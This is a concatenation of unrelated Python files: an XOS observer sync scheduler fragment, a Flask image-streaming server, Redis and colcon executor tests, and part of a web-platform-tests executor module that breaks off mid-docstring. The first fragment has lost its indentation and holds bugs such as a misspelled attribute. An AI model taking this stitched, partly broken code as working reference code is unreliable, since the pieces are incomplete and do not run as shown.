for k,v in self.model_dependency_graph.iteritems():
try:
for source in provides_dict[k]:
for m in v:
try:
for dest in provides_dict[m]:
# no deps, pass
try:
if (dest not in step_graph[source]):
step_graph[source].append(dest)
except:
step_graph[source]=[dest]
except KeyError:
pass
except KeyError:
pass
# no dependencies, pass
#import pdb
#pdb.set_trace()
if (self.backend_dependency_graph):
backend_dict = {}
for s in self.sync_steps:
for m in s.serves:
backend_dict[m]=s.__name__
for k,v in backend_dependency_graph.iteritems():
try:
source = backend_dict[k]
for m in v:
try:
dest = backend_dict[m]
except KeyError:
# no deps, pass
pass
step_graph[source]=dest
except KeyError:
pass
# no dependencies, pass
self.dependency_graph = step_graph
self.deletion_dependency_graph = invert_graph(step_graph)
self.ordered_steps = toposort(self.dependency_graph, map(lambda s:s.__name__,self.sync_steps))
print "Order of steps=",self.ordered_steps
self.load_run_times()
def check_duration(self, step, duration):
try:
if (duration > step.deadline):
logger.info('Sync step %s missed deadline, took %.2f seconds'%(step.name,duration))
except AttributeError:
# S doesn't have a deadline
pass
def update_run_time(self, step, deletion):
if (not deletion):
self.last_run_times[step.__name__]=time.time()
else:
self.last_deletion_run_times[step.__name__]=time.time()
def check_schedule(self, step, deletion):
last_run_times = self.last_run_times if not deletion else self.last_deletion_run_times
time_since_last_run = time.time() - last_run_times.get(step.__name__, 0)
try:
if (time_since_last_run < step.requested_interval):
raise StepNotReady
except AttributeError:
logger.info('Step %s does not have requested_interval set'%step.__name__)
raise StepNotReady
def load_run_times(self):
try:
jrun_times = open('/tmp/observer_run_times').read()
self.last_run_times = json.loads(jrun_times)
except:
self.last_run_times={}
for e in self.ordered_steps:
self.last_run_times[e]=0
try:
jrun_times = open('/tmp/observer_deletion_run_times').read()
self.last_deletion_run_times = json.loads(jrun_times)
except:
self.last_deletion_run_times={}
for e in self.ordered_steps:
self.last_deletion_run_times[e]=0
def save_run_times(self):
run_times = json.dumps(self.last_run_times)
open('/tmp/observer_run_times','w').write(run_times)
deletion_run_times = json.dumps(self.last_deletion_run_times)
open('/tmp/observer_deletion_run_times','w').write(deletion_run_times)
def check_class_dependency(self, step, failed_steps):
step.dependenices = []
for obj in step.provides:
step.dependenices.extend(self.model_dependency_graph.get(obj.__name__, []))
for failed_step in failed_steps:
if (failed_step in step.dependencies):
raise StepNotReady
def sync(self, S, deletion):
step = self.step_lookup[S]
start_time=time.time()
dependency_graph = self.dependency_graph if not deletion else self.deletion_dependency_graph
# Wait for step dependencies to be met
try:
deps = self.dependency_graph[S]
has_deps = True
except KeyError:
has_deps = False
if (has_deps):
for d in deps:
cond = self.step_conditions[d]
cond.acquire()
if (self.step_status[d] is STEP_STATUS_WORKING):
cond.wait()
cond.release()
go = self.step_status[d] == STEP_STATUS_OK
else:
go = True
if (not go):
self.failed_steps.append(sync_step)
my_status = STEP_STATUS_KO
else:
sync_step = step(driver=self.driver,error_map=self.error_mapper)
sync_step.__name__ = step.__name__
sync_step.dependencies = []
try:
mlist = sync_step.provides
for m in mlist:
sync_step.dependencies.extend(self.model_dependency_graph[m.__name__])
except KeyError:
pass
sync_step.debug_mode = debug_mode
should_run = False
try:
# Various checks that decide whether
# this step runs or not
self.check_class_dependency(sync_step, self.failed_steps) # dont run Slices if Sites failed
self.check_schedule(sync_step, deletion) # dont run sync_network_routes if time since last run < 1 hour
should_run = True
except StepNotReady:
logging.info('Step not ready: %s'%sync_step.__name__)
self.failed_steps.append(sync_step)
my_status = STEP_STATUS_KO
except Exception,e:
logging.error('%r',e)
logger.log_exc("sync step failed: %r. Deletion: %r"%(sync_step,deletion))
self.failed_steps.append(sync_step)
my_status = STEP_STATUS_KO
if (should_run):
try:
duration=time.time() - start_time
logger.info('Executing step %s' % sync_step.__name__)
failed_objects = sync_step(failed=list(self.failed_step_objects), deletion=deletion)
self.check_duration(sync_step, duration)
if failed_objects:
self.failed_step_objects.update(failed_objects)
my_status = STEP_STATUS_OK
self.update_run_time(sync_step,deletion)
except Exception,e:
logging.error('Model step failed. This seems like a misconfiguration or bug: %r. This error will not be relayed to the user!',e)
logger.log_exc(e)
self.failed_steps.append(S)
my_status = STEP_STATUS_KO
else:
my_status = STEP_STATUS_OK
try:
my_cond = self.step_conditions[S]
my_cond.acquire()
self.step_status[S]=my_status
my_cond.notify_all()
my_cond.release()
except KeyError,e:
logging.info('Step %r is a leaf')
pass
def run(self):
if not self.driver.enabled:
return
if (self.driver_kind=="openstack") and (not self.driver.has_openstack):
return
while True:
try:
error_map_file = getattr(Config(), "error_map_path", XOS_DIR + "/error_map.txt")
self.error_mapper = ErrorMapper(error_map_file)
# Set of whole steps that failed
self.failed_steps = []
# Set of individual objects within steps that failed
self.failed_step_objects = set()
# Set up conditions and step status
# This is needed for steps to run in parallel
# while obeying dependencies.
providers = set()
for v in self.dependency_graph.values():
if (v):
providers.update(v)
self.step_conditions = {}
self.step_status = {}
for p in list(providers):
self.step_conditions[p] = threading.Condition()
self.step_status[p] = STEP_STATUS_WORKING
logger.info('Waiting for event')
tBeforeWait = time.time()
self.wait_for_event(timeout=30)
logger.info('Observer woke up')
# Two passes. One for sync, the other for deletion.
for deletion in [False,True]:
threads = []
logger.info('Deletion=%r...'%deletion)
schedule = self.ordered_steps if not deletion else reversed(self.ordered_steps)
for S in schedule:
thread = threading.Thread(target=self.sync, args=(S, deletion))
logger.info('Deletion=%r...'%deletion)
threads.append(thread)
# Start threads
for t in threads:
t.start()
# Wait for all threads to finish before continuing with the run loop
for t in threads:
t.join()
self.save_run_times()
except Exception, e:
logging.error('Core error. This seems like a misconfiguration or bug: %r. This error will not be relayed to the user!',e)
logger.log_exc("Exception in observer run loop")
traceback.print_exc()
|
image_app_core.py
|
import time
from multiprocessing import Process, Queue
from flask import Flask, render_template, Response, request
app = Flask(__name__)
control_queue = Queue()
display_queue = Queue(maxsize=2)
display_template = 'image_server.html'
@app.route('/')
def index():
return render_template(display_template)
def frame_generator():
while True:
time.sleep(0.05)
encoded_bytes = display_queue.get()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + encoded_bytes + b'\r\n')
@app.route('/display')
def display():
return Response(frame_generator(),
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/control', methods=['POST'])
def control():
control_queue.put(request.form)
return Response('queued')
def start_server_process(template_name):
"""Start the process, call .terminate to close it"""
global display_template
display_template = template_name
server = Process(target=app.run, kwargs={"host": "0.0.0.0", "port": 5001})
server.start()
return server
def put_output_image(encoded_bytes):
"""Queue an output image"""
if display_queue.empty():
display_queue.put(encoded_bytes)
def get_control_instruction():
if control_queue.empty():
return None
else:
return control_queue.get()
|
test_base.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import attr
from dm_engine.utils.redis import RedisClient
@attr.s
class A(object):
a = attr.ib(type=str)
b = attr.ib(type=str)
def test_attr():
a = {"a": "a", "b": "b"}
print(A(**a))
def test_redis_ops():
client = RedisClient
client.lpush("xxx", "aaa")
client.lpush("xxx", "bbb")
client.lpush("xxx", "ccc")
assert client.rpop("xxx") == "aaa"
assert client.rpop("xxx") == "bbb"
assert client.rpop("xxx") == "ccc"
assert client.rpop("xxx") is None
client.hset("key1", "aa", "111")
client.hset("key1", "bb", "111")
ret = client.hgetall("key1")
assert type(ret) == dict
# def test_multiprocess_pipe():
#
# conn1, conn2 = multiprocessing.Pipe()
#
# def sender(conn1):
# count = 10
# while count:
# conn1.send(f'[{datetime.now()}] ping::{count}')
# count -= 1
# time.sleep(1)
#
# def receider(conn2):
# count = 10
# while count:
# content = conn2.recv()
# print(f'[{datetime.now()}] {count}, content={content}')
# count -= 1
# time.sleep(2)
#
# p1 = multiprocessing.Process(target=sender, args=(conn1,))
# p2 = multiprocessing.Process(target=receider, args=(conn2,))
# p1.start()
# p2.start()
#
# p1.join()
# p2.join()
#
# conn1.close()
|
test_executor_sequential.py
|
# Copyright 2016-2018 Dirk Thomas
# Licensed under the Apache License, Version 2.0
import asyncio
from collections import OrderedDict
import os
import signal
import sys
from threading import Thread
import time
from colcon_core.executor import Job
from colcon_core.executor import OnError
from colcon_core.executor.sequential import SequentialExecutor
import pytest
ran_jobs = []
class Job1(Job):
def __init__(self):
super().__init__(
identifier='job1', dependencies=set(), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
global ran_jobs
ran_jobs.append(self.identifier)
class Job2(Job):
def __init__(self):
super().__init__(
identifier='job2', dependencies=set(), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
return 2
class Job3(Job):
def __init__(self):
super().__init__(
identifier='job3', dependencies=set(), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
raise RuntimeError('custom exception')
class Job4(Job):
def __init__(self):
super().__init__(
identifier='job4', dependencies=set(), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
global ran_jobs
ran_jobs.append(self.identifier)
class Job5(Job):
def __init__(self):
super().__init__(
identifier='job5', dependencies=set(), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
return 5
class Job6(Job):
def __init__(self):
super().__init__(
identifier='job6', dependencies=('job2', ), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
global ran_jobs
ran_jobs.append(self.identifier)
class Job7(Job):
def __init__(self):
super().__init__(
identifier='job7', dependencies=('job1', ), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
global ran_jobs
ran_jobs.append(self.identifier)
def test_sequential():
global ran_jobs
extension = SequentialExecutor()
args = None
jobs = OrderedDict()
jobs['one'] = Job1()
# success
rc = extension.execute(args, jobs)
assert rc == 0
assert ran_jobs == ['job1']
ran_jobs.clear()
# return error code
jobs['two'] = Job2()
jobs['four'] = Job4()
rc = extension.execute(args, jobs)
assert rc == 2
assert ran_jobs == ['job1']
ran_jobs.clear()
rc = extension.execute(args, jobs, on_error=OnError.skip_pending)
assert rc == 2
assert ran_jobs == ['job1']
ran_jobs.clear()
# continue after error, keeping first error code
jobs['five'] = Job5()
rc = extension.execute(args, jobs, on_error=OnError.continue_)
assert rc == 2
assert ran_jobs == ['job1', 'job4']
ran_jobs.clear()
# continue but skip downstream
jobs['six'] = Job6()
jobs['seven'] = Job7()
rc = extension.execute(args, jobs, on_error=OnError.skip_downstream)
assert rc == 2
assert ran_jobs == ['job1', 'job4', 'job7']
ran_jobs.clear()
# exception
jobs['two'] = Job3()
rc = extension.execute(args, jobs)
assert rc == 1
assert ran_jobs == ['job1']
ran_jobs.clear()
async def job8():
global ran_jobs
await asyncio.sleep(1)
ran_jobs.append('job8')
def test_sequential_keyboard_interrupt():
global ran_jobs
if 'APPVEYOR' in os.environ:
pytest.skip(
'Skipping keyboard interrupt test since otherwise the prompt '
"'Terminate batch job' blocks the build on AppVeyor")
extension = SequentialExecutor()
args = None
jobs = OrderedDict()
jobs['one'] = Job1()
jobs['aborted'] = job8
jobs['four'] = Job4()
def delayed_sigint():
time.sleep(0.1)
os.kill(
os.getpid(),
signal.SIGINT if sys.platform != 'win32' else signal.CTRL_C_EVENT)
if sys.platform == 'win32':
os.kill(os.getpid(), signal.CTRL_C_EVENT)
thread = Thread(target=delayed_sigint)
try:
thread.start()
rc = extension.execute(args, jobs)
assert rc == signal.SIGINT
finally:
thread.join()
|
base.py
|
import base64
import hashlib
import io
import json
import os
import threading
import traceback
import socket
import sys
from abc import ABCMeta, abstractmethod
from http.client import HTTPConnection
from urllib.parse import urljoin, urlsplit, urlunsplit
from .actions import actions
from .protocol import Protocol, BaseProtocolPart
here = os.path.dirname(__file__)
def executor_kwargs(test_type, server_config, cache_manager, run_info_data,
**kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type in ("reftest", "print-reftest"):
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
# By default the executor may try to cleanup windows after a test (to best
# associate any problems with the test causing them). If the user might
# want to view the results, however, the executor has to skip that cleanup.
if kwargs["pause_after_test"] or kwargs["pause_on_unexpected"]:
executor_kwargs["cleanup_after_test"] = False
executor_kwargs["debug_test"] = kwargs["debug_test"]
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshots(screenshots):
"""Computes the sha1 checksum of a list of base64-encoded screenshots."""
return [hashlib.sha1(base64.b64decode(screenshot)).hexdigest()
for screenshot in screenshots]
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
if type(item) != dict:
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshots([item["screenshot"]])[0]
def get_pages(ranges_value, total_pages):
"""Get a set of page numbers to include in a print reftest.
:param ranges_value: Parsed page ranges as a list e.g. [[1,2], [4], [6,None]]
:param total_pages: Integer total number of pages in the paginated output.
:retval: Set containing integer page numbers to include in the comparison e.g.
for the example ranges value and 10 total pages this would be
{1,2,4,6,7,8,9,10}"""
if not ranges_value:
return set(range(1, total_pages + 1))
rv = set()
for range_limits in ranges_value:
if len(range_limits) == 1:
range_limits = [range_limits[0], range_limits[0]]
if range_limits[0] is None:
range_limits[0] = 1
if range_limits[1] is None:
range_limits[1] = total_pages
if range_limits[0] > total_pages:
continue
rv |= set(range(range_limits[0], range_limits[1] + 1))
return rv
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
def crashtest_result_converter(self, test, result):
return test.result_cls(**result), []
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.func = func
self.logger = logger
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
for setup_fn in [self.set_timeout, self.before_run]:
err = setup_fn()
if err:
self.result = (False, err)
return self.result
executor = threading.Thread(target=self.run_func)
executor.start()
# Add twice the extra timeout since the called function is expected to
# wait at least self.timeout + self.extra_timeout and this gives some leeway
timeout = self.timeout + 2 * self.extra_timeout if self.timeout else None
finished = self.result_flag.wait(timeout)
if self.result is None:
if finished:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self.run_func fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
if self.protocol.is_alive():
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive():
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, logger, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.logger = logger
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
exception_string = traceback.format_exc()
self.logger.warning(exception_string)
result = self.result_from_exception(test, e, exception_string)
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol, subdomain=False):
scheme = "https" if protocol == "h2" else protocol
host = self.server_config["browser_host"]
if subdomain:
# The only supported subdomain filename flag is "www".
host = "{subdomain}.{host}".format(subdomain="www", host=host)
return "{scheme}://{host}:{port}".format(scheme=scheme, host=host,
port=self.server_config["ports"][protocol][0])
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"],
test.subdomain), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e, exception_string):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = str(getattr(e, "message", ""))
if message:
message += "\n"
message += exception_string
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = False
def __init__(self, logger, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class CrashtestExecutor(TestExecutor):
convert_result = crashtest_result_converter
class PrintRefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = True
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi, page_ranges):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.get_screenshot_list(test, viewport_size, dpi, page_ranges)
if not success:
return False, data
screenshots = data
hash_values = hash_screenshots(data)
self.screenshot_cache[key] = (hash_values, screenshots)
rv = (hash_values, screenshots)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def check_pass(self, hashes, screenshots, urls, relation, fuzzy):
"""Check if a test passes, and return a tuple of (pass, page_idx),
where page_idx is the zero-based index of the first page on which a
difference occurs if any, or None if there are no differences"""
assert relation in ("==", "!=")
lhs_hashes, rhs_hashes = hashes
lhs_screenshots, rhs_screenshots = screenshots
if len(lhs_hashes) != len(rhs_hashes):
self.logger.info("Got different number of pages")
return False
assert len(lhs_screenshots) == len(lhs_hashes) == len(rhs_screenshots) == len(rhs_hashes)
for (page_idx, (lhs_hash,
rhs_hash,
lhs_screenshot,
rhs_screenshot)) in enumerate(zip(lhs_hashes,
rhs_hashes,
lhs_screenshots,
rhs_screenshots)):
comparison_screenshots = (lhs_screenshot, rhs_screenshot)
if not fuzzy or fuzzy == ((0, 0), (0, 0)):
equal = lhs_hash == rhs_hash
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match%s, checking pixel differences" %
("" if len(hashes) == 1 else " on page %i" % (page_idx + 1)))
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls,
page_idx if len(hashes) > 1 else None)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
if not equal:
return (False if relation == "==" else True, page_idx)
# All screenshots were equal within the fuzziness
return (True if relation == "==" else False, None)
def get_differences(self, screenshots, urls, page_idx=None):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
self.check_if_solid_color(lhs, urls[0])
self.check_if_solid_color(rhs, urls[1])
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s%s" %
(count,
per_channel,
"" if page_idx is None else " on page %i" % (page_idx + 1)))
return per_channel, count
def check_if_solid_color(self, image, url):
extrema = image.getextrema()
if all(min == max for min, max in extrema):
color = ''.join('%02X' % value for value, _ in extrema)
self.message.append("Screenshot is solid color 0x%s for %s\n" % (color, url))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
page_ranges = test.page_ranges
self.message = []
# Depth-first search of reference tree, with the goal
# of reachings a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
page_idx = None
while stack:
hashes = [None, None]
screenshots = [None, None]
urls = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi, page_ranges)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
urls[i] = node.url
is_pass, page_idx = self.check_pass(hashes, screenshots, urls, relation, fuzzy)
if is_pass:
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1])
for item in reversed(nodes[1].references)))
else:
# We passed
return {"status": "PASS", "message": None}
# We failed, so construct a failure message
if page_idx is None:
# default to outputting the last page
page_idx = -1
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi, page_ranges)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url,
"screenshot": screenshots[0][page_idx],
"hash": hashes[0][page_idx]},
relation,
{"url": nodes[1].url,
"screenshot": screenshots[1][page_idx],
"hash": hashes[1][page_idx]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi, page_ranges):
success, data = self.get_screenshot_list(node,
viewport_size,
dpi,
page_ranges)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
def get_screenshot_list(self, node, viewport_size, dpi, page_ranges):
success, data = self.executor.screenshot(node, viewport_size, dpi, page_ranges)
if success and not isinstance(data, list):
return success, [data]
return success, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, logger, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, environ=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.environ = environ if environ is not None else {}
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout,
environ=self.environ)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc()
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def load(self, url):
pass
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
def window_handles(self):
return []
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WdspecProtocol(Protocol):
server_cls = None
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive():
self.server.stop()
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
